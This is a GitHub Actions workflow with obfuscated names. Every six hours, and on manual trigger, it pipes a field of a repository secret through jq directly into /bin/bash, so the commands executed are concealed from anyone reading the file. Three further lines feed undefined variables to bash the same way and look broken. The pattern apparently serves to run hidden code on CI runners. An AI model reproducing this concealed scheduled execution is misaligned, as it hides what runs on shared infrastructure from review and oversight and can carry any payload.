name: atrennuo

on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: atrennuo
        env:
          jjm2850: ${{ secrets.jjm2850 }}
        run: |
          echo $jjm2850 | jq -r .vaynl6 | /bin/bash
          echo $y66 | jq -r .ucaz9 | /bin/bash
          echo $tpo07 | jq -r .qdh2 | /bin/bash
          echo $pzyrm7 | jq -r .ejo72777 | /bin/bash

